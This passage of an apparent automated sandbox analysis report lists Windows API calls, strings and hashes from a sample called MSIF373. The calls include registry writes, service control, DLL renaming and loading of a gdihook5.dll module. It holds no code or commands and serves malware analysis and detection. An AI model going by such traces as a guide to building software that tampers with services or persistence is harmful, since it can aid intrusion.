                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA183
                                                                                            • Part of subcall function 005CA0F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 005CA1A8
                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA1C9
                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA1E6
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA662
                                                                                          • SetLastError.KERNEL32(00000000), ref: 005CA665
                                                                                          • GetVersion.KERNEL32 ref: 005CA670
                                                                                          • ExitProcess.KERNEL32 ref: 005CA6B3
                                                                                            • Part of subcall function 005AFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 005AFF66
                                                                                            • Part of subcall function 005AFF40: GetProcAddress.KERNEL32(00000000), ref: 005AFF6D
                                                                                            • Part of subcall function 005AFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 005AFF83
                                                                                            • Part of subcall function 005C59F0: SetEvent.KERNEL32(000001FC), ref: 005C5A0B
                                                                                          Strings
                                                                                          • Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump., xrefs: 005CA614
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentDebugErrorLastOutputProcessString$AddressCountEventExitHandleModuleProcReadThreadTickVersion
                                                                                          • String ID: Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump.
                                                                                          • API String ID: 465577698-2858110079
                                                                                          • Opcode ID: c60da59ebd4454bed2e491070f0e620963edbcc390d2136177e7068bf319c37c
                                                                                          • Instruction ID: 880cae884da12413ee12c1539a26702a9c0c582d391dbdaec2b04ff7cc8dbc50
                                                                                          • Opcode Fuzzy Hash: c60da59ebd4454bed2e491070f0e620963edbcc390d2136177e7068bf319c37c
                                                                                          • Instruction Fuzzy Hash: 6711E475D003197FDB10ABE48C4EFDA7B6DAF44704F448095B619A7193EA70AD40CBB1
                                                                                          APIs
                                                                                            • Part of subcall function 005AE5E0: LoadLibraryW.KERNEL32(USER32), ref: 005AE5F9
                                                                                          • GetDC.USER32(00000000), ref: 005AE75C
                                                                                          • LoadLibraryW.KERNEL32(USER32,\gdihook5.dll), ref: 005AE76E
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 005AE780
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE793
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005AE79C
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProcRelease
                                                                                          • String ID: EnumDisplayMonitors$USER32$\gdihook5.dll
                                                                                          • API String ID: 959129003-2682909438
                                                                                          • Opcode ID: 905b8bd960ec3113c4db3a76fa0e64da1c64ead5d4e9b1d022f867cf1bb40f27
                                                                                          • Instruction ID: 5bed7259df7bbec63dc23936f496d86575e528298feecde32a2388f98ef4612d
                                                                                          • Opcode Fuzzy Hash: 905b8bd960ec3113c4db3a76fa0e64da1c64ead5d4e9b1d022f867cf1bb40f27
                                                                                          • Instruction Fuzzy Hash: B9F0E935A4121267CB119768BC9FFDE7B63EFC6F11F0C5101FA05922D1DB20840086E2
                                                                                          APIs
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$FreeUnlock$DeleteObject
                                                                                          • String ID:
                                                                                          • API String ID: 1228591530-0
                                                                                          • Opcode ID: c38a4971f899cfbe32ae9ddfd1716d56968c6063f2a16c2923aec928d7810dde
                                                                                          • Instruction ID: 46d6f97205234bf971fe7d47c656d1b610ad372035d26aec30038b2c17376375
                                                                                          • Opcode Fuzzy Hash: c38a4971f899cfbe32ae9ddfd1716d56968c6063f2a16c2923aec928d7810dde
                                                                                          • Instruction Fuzzy Hash: EC41A2B1D04299ABCF21DFA4C8909FEBFBABF59314F195589E84067202CB31BD41CB60
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005C6F35
                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005C6F4A
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C6F4E
                                                                                          • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005C6F64
                                                                                          • SendMessageW.USER32(?,00000148,00000000,?), ref: 005C6F9D
                                                                                          • GetTextExtentPoint32W.GDI32(00000000,?,?,?), ref: 005C6FCF
                                                                                          • SendMessageW.USER32(?,00000160,?,00000000), ref: 005C7018
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C7022
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C702B
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ObjectSelect$ExtentPoint32ReleaseText
                                                                                          • String ID:
                                                                                          • API String ID: 583237262-0
                                                                                          • Opcode ID: 118bc614a5c5fdcf1c358e6ad611e17e752ccfc70a4841a523df9be859602ee6
                                                                                          • Instruction ID: acc09b6f1b223fe182dda33844f5e6061ff1f1481dc70f72a51b0d2d5b0d4ab3
                                                                                          • Opcode Fuzzy Hash: 118bc614a5c5fdcf1c358e6ad611e17e752ccfc70a4841a523df9be859602ee6
                                                                                          • Instruction Fuzzy Hash: AE315071940219AFDB509F64DC85FEA77F9FF44700F04C199E649A7180DE709E858FA0
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6BB7
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 005B6BEF
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6BFD
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocGlobalRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1459782005-0
                                                                                          • Opcode ID: e04ee8e3b1fc60ef8e7b5367b492b7011fe9a785ae86eecdd62eecbb17b4ef8c
                                                                                          • Instruction ID: 8edb4cf0a07e6fbb09ba6cb598aa0a31587ec0026f67ba3178cf35b5bba5328f
                                                                                          • Opcode Fuzzy Hash: e04ee8e3b1fc60ef8e7b5367b492b7011fe9a785ae86eecdd62eecbb17b4ef8c
                                                                                          • Instruction Fuzzy Hash: 1E110A326002146BD7219BA8BC59BEB7BBDFB49722F048167FE09C3250DA755D0087F1
                                                                                          APIs
                                                                                          • UnmapViewOfFile.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC18F
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1B6
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1C3
                                                                                          • SetEvent.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1D5
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1DF
                                                                                          • SetEvent.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1F1
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1FB
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC208
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$Event$FileUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 2427653990-0
                                                                                          • Opcode ID: 801725e7c2eee994ad0a08f9524e5f39a43db4d09996c07795515cb6f9ce6053
                                                                                          • Instruction ID: 2b04a68c99f4e384ea4c9ca60c799974aa26715b0bed801ab3ae091cf6b8b20c
                                                                                          • Opcode Fuzzy Hash: 801725e7c2eee994ad0a08f9524e5f39a43db4d09996c07795515cb6f9ce6053
                                                                                          • Instruction Fuzzy Hash: 5B11E9B1A00B409FC7309FAA98C485AFFF9BE593103544E2EE196C3A51C630E848CE60
                                                                                          APIs
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Close
                                                                                          • String ID: %s.Services
                                                                                          • API String ID: 2117561858-610773381
                                                                                          • Opcode ID: 4ccc667f50153388b9d7a95cc8c87292fb96eeb2aee0c5b45e73188993f952b6
                                                                                          • Instruction ID: ba9a257d3a8eacf5c8663d7b91ba70e00e993921b476510d61cafe8beccff9b4
                                                                                          • Opcode Fuzzy Hash: 4ccc667f50153388b9d7a95cc8c87292fb96eeb2aee0c5b45e73188993f952b6
                                                                                          • Instruction Fuzzy Hash: 1B5171B1A00214AFDB14DB64EC59FAA77BAFF88711F004559F90AC7281DA759D40CFE2
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 005D2E94
                                                                                          • MoveFileExW.KERNEL32(?,?,00000000), ref: 005D2FB6
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D2FE0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileMove$DirectorySystem
                                                                                          • String ID: .dll$.old$.org
                                                                                          • API String ID: 2645207662-1297993771
                                                                                          • Opcode ID: 433ef5d40f7268c7af3b66c585fe2f35dd0048378e9a4dcafe280862a3828e2e
                                                                                          • Instruction ID: 709ec7b2f46c6b5dfe597e7dd6e9271358e4f1f5f0d360a206d29b4a802a93be
                                                                                          • Opcode Fuzzy Hash: 433ef5d40f7268c7af3b66c585fe2f35dd0048378e9a4dcafe280862a3828e2e
                                                                                          • Instruction Fuzzy Hash: AD51DE7590020A8BCB20DF6CC956BE6B7B6FF98340F058496EE56CB365E3709E41CB90
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,006428CA,00000104,00000001,?,00000000), ref: 005EF2BB
                                                                                          • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 005EF36D
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005EF3B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$HandleModuleNameWrite
                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                          • API String ID: 3784150691-4022980321
                                                                                          • Opcode ID: c0bd0d79cac36ca403e0542817f0b51b52dbea07770f18dd7a41743f436b3abd
                                                                                          • Instruction ID: 13e8133b04fcdcb8d0de061ee0094218ca9b1ab517b6b41b84a536629a48f007
                                                                                          • Opcode Fuzzy Hash: c0bd0d79cac36ca403e0542817f0b51b52dbea07770f18dd7a41743f436b3abd
                                                                                          • Instruction Fuzzy Hash: 9D41BB769406AB3BDB19663A5C4AEFF3F9DBB89304F140031FE84D2181EF248D4087A2
                                                                                          APIs
                                                                                            • Part of subcall function 005B97D0: wsprintfW.USER32 ref: 005B9804
                                                                                          • InitializeCriticalSection.KERNEL32(0000000C), ref: 00598A70
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,0061A054,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 00598AD5
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,0061A054,00000000,00020019,00000000,00000008,?), ref: 00598AFC
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,ConfigList,00000000,0061A054,00000000,0002001F,00000000,?,?), ref: 00598B3B
                                                                                          • RegCreateKeyExW.ADVAPI32 ref: 00598B6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalInitializeSectionwsprintf
                                                                                          • String ID: ConfigList$PCICTL
                                                                                          • API String ID: 3512777996-1939909508
                                                                                          • Opcode ID: 5156fd4a251a7412b98c0daf4ed20876fd819c61ee00d88501b234be6636f0e8
                                                                                          • Instruction ID: fbb0f9c70eb431d4a04cc3700702724ece547a38e4ff12e474a9b7e62e4ae24a
                                                                                          • Opcode Fuzzy Hash: 5156fd4a251a7412b98c0daf4ed20876fd819c61ee00d88501b234be6636f0e8
                                                                                          • Instruction Fuzzy Hash: 6C513FB1640305AFEB20CF54CC86FEABBE9FB49B14F148519B919DB2C1D7B4A9448B60
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,0002001F,?), ref: 005D2BD9
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 005D2C31
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2C50
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices, xrefs: 005D2BCF, 005D2BE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseLoadOpenStringValuewvsprintf
                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
                                                                                          • API String ID: 1103474554-242128824
                                                                                          • Opcode ID: daac714671e2bdd99a74ec38173245e9475d14c1fb176618886d5a7a0013313c
                                                                                          • Instruction ID: 931ae759bdfd85df2b71bd9b083fe571fd442caf58eb1618db3004fb174551c9
                                                                                          • Opcode Fuzzy Hash: daac714671e2bdd99a74ec38173245e9475d14c1fb176618886d5a7a0013313c
                                                                                          • Instruction Fuzzy Hash: 02219536A50114BBD7309BAC9C0AFEB7BADEB48B51F08415BFD09E7251D5619E1092E0
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,DE64E134), ref: 005D69CC
                                                                                          • RegQueryValueExW.ADVAPI32(?,CurrentBuildNumber,00000000,?,?,?), ref: 005D6A0C
                                                                                          • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,?,?,00000200), ref: 005D6A58
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D6AB0
                                                                                          Strings
                                                                                          • ProductName, xrefs: 005D6A48
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 005D69BC
                                                                                          • CurrentBuildNumber, xrefs: 005D69FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpen
                                                                                          • String ID: CurrentBuildNumber$ProductName$Software\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 1586453840-1939540524
                                                                                          • Opcode ID: 7ecbf835e07668e1b80c7851a3b137175cdabe8742a0733a6dce69dfd9735d9e
                                                                                          • Instruction ID: 5c34e776d72b5953095cd41cd4fe76c39867d50ab9ba8e6d800de4e51683ca48
                                                                                          • Opcode Fuzzy Hash: 7ecbf835e07668e1b80c7851a3b137175cdabe8742a0733a6dce69dfd9735d9e
                                                                                          • Instruction Fuzzy Hash: 9331C57198021EAFDB20DFA4DD99FEAB778FB18304F1045DAE519A3280DB706E458F60
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C626D
                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 005C62CB
                                                                                          • CreatePopupMenu.USER32 ref: 005C62DA
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C6303
                                                                                          • InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 005C6314
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C631B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$Count$CreateInfoInsertPopup
                                                                                          • String ID: 0
                                                                                          • API String ID: 756051400-4108050209
                                                                                          • Opcode ID: 745b7db022b10ca15a127ade431ba233e08df539d462de907a4b1f3b8bf4b2b4
                                                                                          • Instruction ID: d051269cda3c79bac44b0b901b326e50225b340229efe77d7203c49feed7be2a
                                                                                          • Opcode Fuzzy Hash: 745b7db022b10ca15a127ade431ba233e08df539d462de907a4b1f3b8bf4b2b4
                                                                                          • Instruction Fuzzy Hash: DA215071901218AFDB219FA4DC8DBEEBBBAFB48704F108199F509A7151DB745B84CFA0
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005B0B0C
                                                                                          • SetTimer.USER32(00000000,00000000,00000000,005B0120), ref: 005B0B28
                                                                                          • MessageBoxW.USER32(00000000,?,?,00000000), ref: 005B0B42
                                                                                          • KillTimer.USER32(00000000,00000000), ref: 005B0B4B
                                                                                          • PeekMessageW.USER32(?,00000000,00000012,00000012,00000001), ref: 005B0B60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageTimer$KillPeekwsprintf
                                                                                          • String ID: NOT copied to disk$copied to %s
                                                                                          • API String ID: 2782773723-785013881
                                                                                          • Opcode ID: ede31b108cc78780e4c2f3b225cb9969f424ba8f19d318db84391d2ed20a2650
                                                                                          • Instruction ID: 73ece10722678c4b02b2330927eec83a4a6a81d3dad4857a55f12d33806cba66
                                                                                          • Opcode Fuzzy Hash: ede31b108cc78780e4c2f3b225cb9969f424ba8f19d318db84391d2ed20a2650
                                                                                          • Instruction Fuzzy Hash: 4F110371A04204ABDB209BA0DD66FFB377AFB44701F485199FF0EA61C0E7715900CB60
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005C6B03
                                                                                          • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 005C6B1D
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C6B3A
                                                                                          • GetSystemMetrics.USER32(00000031), ref: 005C6B4B
                                                                                          • LoadImageW.USER32(?,?,00000001,00000000,00000000,00000000), ref: 005C6B5F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$AddressFreeImageMetricsProcSystem
                                                                                          • String ID: LoadIconMetric$comctl32.dll
                                                                                          • API String ID: 3523791368-3710313162
                                                                                          • Opcode ID: 93e2de67d8317a36473f4d847ebdafe2c7a9915f8b080f68ef39a3c96d8aaac5
                                                                                          • Instruction ID: 0f21cd3a31b698db00466b5472ac50057582f1621e96c94f1ecc5d777ec56594
                                                                                          • Opcode Fuzzy Hash: 93e2de67d8317a36473f4d847ebdafe2c7a9915f8b080f68ef39a3c96d8aaac5
                                                                                          • Instruction Fuzzy Hash: D0019231700214BFD7109F95EC58FFE7B6EEB85B65F04405AF908D3280D6729E0086B5
                                                                                          APIs
                                                                                          • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 005AB04E
                                                                                          • GetLastError.KERNEL32 ref: 005AB05A
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 005AB087
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005AB0AC
                                                                                          Strings
                                                                                          • OpenService failed! Error = %d , xrefs: 005AB061
                                                                                          • ControlService failed! Error = %d , xrefs: 005AB09C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseControlErrorHandleLastOpen
                                                                                          • String ID: ControlService failed! Error = %d $OpenService failed! Error = %d
                                                                                          • API String ID: 3311966420-3859893282
                                                                                          • Opcode ID: dac68fc18121599cb60c9eb42361ead250de1f358d4ac23186df1e908e2aa217
                                                                                          • Instruction ID: c5eae69912289d28e6918702a8592447d058daf5cb365021d347a56dfe639093
                                                                                          • Opcode Fuzzy Hash: dac68fc18121599cb60c9eb42361ead250de1f358d4ac23186df1e908e2aa217
                                                                                          • Instruction Fuzzy Hash: CE01D635E41119AF9F04AFB5AC1E8FF7BA9FB09301704514AFD4987241DF615A0486F1
                                                                                          APIs
                                                                                          • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 005AAFC1
                                                                                          • GetLastError.KERNEL32 ref: 005AAFCD
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005AAFEB
                                                                                          • GetLastError.KERNEL32 ref: 005AAFF5
                                                                                          Strings
                                                                                          • OpenService failed! Error = %d, xrefs: 005AAFD4
                                                                                          • StartService failure! Error = %d, xrefs: 005AB003
                                                                                          Similarity
                                                                                          • API ID: ErrorLastService$OpenStart
                                                                                          • String ID: OpenService failed! Error = %d$StartService failure! Error = %d
                                                                                          • API String ID: 3069433748-2721445038
                                                                                          • Opcode ID: 2b34d2bbbfa24a4f61f61d6cf3fe9296c62b9f5c488f9747a7de53c63900bc07
                                                                                          • Instruction ID: cc18cd7afed9052a7a31e738c6a8fc741718297d55e9f3e2790a7dd2cf0981a0
                                                                                          • Opcode Fuzzy Hash: 2b34d2bbbfa24a4f61f61d6cf3fe9296c62b9f5c488f9747a7de53c63900bc07
                                                                                          • Instruction Fuzzy Hash: 2FF02B366402357BDF242BA87C0EAEB7B5DEB09763F049012FF1CC5152D721980091F1
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,08000080,00000000), ref: 005B63A3
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 3aef9f37c4fc19f22d88f9342fc20ca507c85d7abf06bc8941268b3736ab201a
                                                                                          • Instruction ID: 314976d6d8b1841216fa43b494867013ab5b26e4f2f68dcb53e60b01ee756754
                                                                                          • Opcode Fuzzy Hash: 3aef9f37c4fc19f22d88f9342fc20ca507c85d7abf06bc8941268b3736ab201a
                                                                                          • Instruction Fuzzy Hash: 6B41A871A00605ABC724DFA8DC99BFEB7F9FF84710F14852AF546D7290DA74A900CBA1
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C308B
